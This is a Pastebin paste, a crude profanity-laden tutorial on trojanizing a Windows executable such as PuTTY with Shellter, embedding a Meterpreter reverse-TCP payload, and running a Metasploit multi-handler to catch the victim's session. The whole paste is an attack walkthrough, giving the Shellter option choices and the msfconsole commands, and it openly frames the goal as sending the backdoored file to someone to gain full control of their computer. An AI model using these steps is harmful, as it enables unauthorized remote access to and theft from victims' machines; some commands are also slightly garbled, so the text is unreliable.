Advertisement
killida1

Killida1's meterpreter the l337 way :O

Dec 27th, 2016
130
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.51 KB | None | 0 0
  1. Hacking with shellter and Metasploit 101 (making a virus to windows) Lulz for the win!!!!
  2.  
  3. to start with Port forward Port 4444 thats right if you can't do that FUUUUCCC OFFF BIATCH
  4.  
  5. step one creating the payload (the file the target gonna click that gives u access to his C0mput3r u heard it full fucking cmd access use shellter for it (almost undetectable backdoor 7/57 anti virus detectable Killida1 gives 10/10 stars. Download site https://www.shellterproject.com/
  6.  
  7. then go into the folder u made for it and you'll need wine since shellter is an .exe and u need a .exe file to backdoor ( i recommend putty download here http://www.putty.org/) to get wine on linux apt-get install wine (wow that simple) and then go to the shellter folder and use this command "wine shellter.exe" then "A" then PE target:PUTTY OR EXE LOCATION then L then 1 and with set lhost your external ip or internal depends on outside or inside your local network and must be the same as later on SET LPORT:4444 always 4444 ;=) or 1337 if your l33t :O WOO WOO!!!!
  8. and wupti you got youself a backdoored file you can send to the person you wan't control of but WAIT we need a listener WOW!!!!
  9.  
  10. Step 2: the listener.... well metasploit is perfect for that so run msfconsole and all these badass commands
  11. use exploit/multihandler
  12. set payload windows/meterpreter/reverse_tcp
  13. set Lhost YOUR IP EXTERNAL IF 4444 IS PORT FORWARDED
  14. set Lport 4444
  15. exploit
  16.  
  17. then wait for the user to run it and then it will open a session then type:
  18. help
  19. and you good to go ;)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement